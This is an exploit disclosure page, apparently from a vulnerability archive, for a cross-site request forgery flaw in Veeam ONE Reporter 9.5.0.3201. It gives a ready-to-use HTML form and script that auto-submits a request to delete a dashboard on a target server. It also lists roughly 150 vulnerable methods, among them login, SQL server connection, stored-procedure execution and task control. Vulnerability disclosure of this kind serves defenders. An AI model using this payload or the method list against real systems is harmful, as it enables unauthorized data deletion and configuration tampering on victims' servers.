Veeam ONE Reporter 9.5.0.3201 Cross Site Request Forgery

2019.05.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods) # Exploit Author: Seyed Sadegh Khatami # Website: https://www.cert.ir # Date: 2019-04-27 # Google Dork: N/A # Vendor Homepage: https://www.veeam.com/ # Software Link: https://www.veeam.com/virtual-server-management-one-free.html # Version: 9.5.0.3201 # Tested on: Windows Server 2016 #exploit: <form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'> <input name='f' id='dd'> </form> <script> document.getElementById("dd").value= JSON.stringify({ id: '1', method: 'deleteDashboard', params:{ 'id' : 21} }); document.getElementById("del").submit(); </script> ########################################## #all methods is vulnerable ########################################## #addDashboard(p) #addDashboardUser(par) #addDashboardUserList(par) #applySchedulingForDashboard(dashboardId, taskId, config) #applySchedulingForFolder(folderId, taskId, config) #applySchedulingForReport(reportId, taskId, vmr, config) #canModifyDashboard(id) #captureContainer(data, taskId) #changeObjectVisibility(objectId, visible) #checkForUpdateReportPack(confirm) #checkIfAdmin() #checkUserPermissionsResolved(o) #checkWinVersion() #clearContainer() #connectToSqlServer(data, save) #DBExecuteProcedure(db) #DBStoreLoad(db) #DBStoreSave(db) #deleteDashboard(id) #deleteDashboardImage(imageId) #deleteDashboardWidget(p) #DeleteFolder(param) #deleteReportPack(name, id, type) #deleteTask(id) #doLogin(domain, login, password) #editDashboard(p) #emptyDashboardRecycleBin(o) #findDashboardUsers(p) #getAboutData() #getActionParameters() #getAdvancedData() #getAlarms() #getAllSchedulingsForDashboard(info) #getAllSchedulingsForFolder(info) #getAllSchedulingsForReport(info) #getBackUpTree(wsj) #getBusinessViewTree(wsj) #getComboData() #getCommonGridItem() #getConfiguration() #getConfigurationOverview(id) #getConnectedServersGridItem() #getDashboardData(dashboard_id) #getDashboardImages(p) #getDashboardPermissions(p) #getDashboardPredefiniedReports(p) #getDashboards(p) #getDashboardSSRSChartTypes(p) #getDashboardUserList(p) #getDashboardWidgetTypeData(p) #getDefaultUserName() #getDeletedDashboards(p) #getEnumeratingTaskContainers(id) #getEnumeratingTaskProperties(id) #getEnumeratingTaskScheduling(id) #getExtensionModules(p) #getIgnoredDatastores(p) #getIgnoredDatastoresDetails(p) #getInfrastructureTree(wsj) #getIsReporterFreeVersion() #getJobData(id) #getLicenseData() #getLicensedHVSockets(p) #getLicensedVMSockets(p) #getMetadata(query, reload) #getNeedToDisableTabs() #getNotificationData() #getObjectsToHide(p) #getOptionList() #getReportFilters(param) #getReportImageName() #getReportListTreeCheckbox(wsj) #getReportListTreeDashboard(wsj) #getReportListTreeWorkspace(wsj) #getReportManagementTree(wsj) #getReportsSectionsTree(wsj) #getReportStatistics(param) #getScheduleDashboardConfig(dashboardId, taskId) #getScheduleFolderConfig(folderId, taskId) #getScheduleReportConfig(reportId, taskId, packType) #getScriptArgumentList() #getServerScopeAll(wsj) #getSessionDetails(idwithtype) #getSessions(p) #getSessionsTaskTypes(p) #getSiteStatusGridItem() #getSmtpServerData() #getSqlServerData() #getSsrsServerData() #getSSRSStatus() #getStartStopDeleteButtonsEnabled(id) #getStatistics() #getTaskList(p) #getUpdateSessionInfo(o) #getvCloudList(p) #getVideoReportData(interval, intervalPeriod, scope) #getVmStatus() #getWidgetCustomChartConstructorData(p) #getWidgetData(r) #getWidgetList(item) #getWidgetPackList(j) #getWidgetParams(uid) #getWorkspace() #getWorkspaceReportGridItems(param) #isSmtpConfigured() #publishDashboard(id, publish) #recalculateProjects(ids) #removeDashboardUser(par) #resetReportImageName() #resetSchedulingForDashboard(dashboardId, taskId) #resetSchedulingForDashboardArray(dashboardId, taskId) #resetSchedulingForFolder(folderId) #resetSchedulingForReport(reportId, vmr) #resetSchedulingTaskForFolder(folderId, taskId) #resetSchedulingTaskForReport(reportId, taskId, vmr) #resetSchedulingTasksForFolderArray(folderId, taskId) #resetSchedulingTasksForReportArray(reportId, taskId, vmr) #restoreDashboard(p) #revokeHost(hostName) #revokeHostHV(hostName) #SaveFolder(param) #saveIgnoredDatastores(taskContainerId, dataStores) #saveSchedulingInfo(taskId, taskProp) #saveTask(taskProp, taskContainers, excludes) #sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel) #sendTestMessage(data, setting) #setAdvancedData(measure) #setComboData(data) #setDashboardUserPermissions(par) #setDashboardWidget(p) #SetDragAndDropPosition(dwid, colIndex, position, height) #setSchedulingEnability(dashboardId, taskId, disabled) #setSchedulingEnabilityArray(dashboardId, taskId, disabled) #setSchedulingEnabilityForFolder(folderId, taskId, disabled) #setSchedulingEnabilityForFolderArray(folderId, taskId, disabled) #setSchedulingEnabilityForReport(reportId, taskId, disabled) #setSchedulingEnabilityForReportArray(reportId, taskId, disabled) #setSmtpServerData(data) #setSsrsServerData(data) #startTask(id) #stopTask(id) #system.about() # Returns a summary about the server implementation for display purposes. #system.listMethods() # Returns an array of method names implemented by this service. #system.version() # Returns the version server implementation using the major, minor, build and revision format. #testServer(tcd) #testSsrsConnection(data) #updateDashboardPosition(p) #updateTreeExpandedStates(wsj, a) #validateTaskName(tcd, id) ##########################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top